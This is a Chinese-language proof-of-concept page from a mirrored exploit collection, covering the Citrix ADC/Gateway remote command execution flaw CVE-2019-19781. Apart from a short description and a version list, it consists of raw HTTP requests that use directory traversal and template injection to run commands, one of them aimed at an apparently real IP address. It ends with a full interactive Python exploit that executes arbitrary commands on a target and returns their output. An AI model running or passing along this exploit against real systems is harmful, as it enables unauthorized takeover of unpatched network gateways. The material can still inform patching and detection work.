admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

108 lines
3.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Citrix 远程命令执行漏洞 CVE-2019-19781
## 漏洞描述
Citrix ADCNetScalers中的目录穿越错误这个错误会调用perl脚本perl脚本用于将XML格式的文件附加到受害计算机因此产生远程执行代码。
## 漏洞影响
```
Citrix NetScaler ADC and NetScaler Gateway version 10.5
Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1
Citrix ADC and Citrix Gateway version 13.0
```
## 漏洞复现
访问 `https://target-ip``http://target-ip`登录系统,默认用户和密码登录:`nsroot/nsroot`
利用目录穿越写入命令语句到`newbm.pl`文件中:
```
POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: target-ip
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.23.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/15ffbdca
Content-Length: 89
url=http://example.com&title=15ffbdca&desc=[% template.new('BLOCK' = 'print `whoami`') %]
```
![img](./images/202211301529401.png)
GET方式访问写入的xml文件
```
GET /vpns/portal/15ffbdca.xml HTTP/1.1
Host: 50.202.211.151
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.23.0
NSC_NONCE: nsroot
NSC_USER: nsroot
```
![img](./images/202211301529487.png)
## 漏洞EXP
```python
#!/usr/bin/env python
# https://github.com/mpgn/CVE-2019-19781
# # #
import requests
import string
import random
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
print("Found by Mikhail Klyuchnikov")
print("")
if len(sys.argv) < 2:
print("[-] No URL provided")
sys.exit(0)
while True:
try:
command = input("command > ")
random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
print("[+] Adding bookmark", random_xml + ".xml")
burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
if r.status_code == 200:
print("[+] Bookmark added")
else:
print("\n[-] Target not vulnerable or something went wrong")
sys.exit(0)
burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers,verify=False)
replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
print("[+] Result of the command: \n")
print(replaced)
except KeyboardInterrupt:
print("Exiting...")
break
```
Reference in New Issue View Git Blame Copy Permalink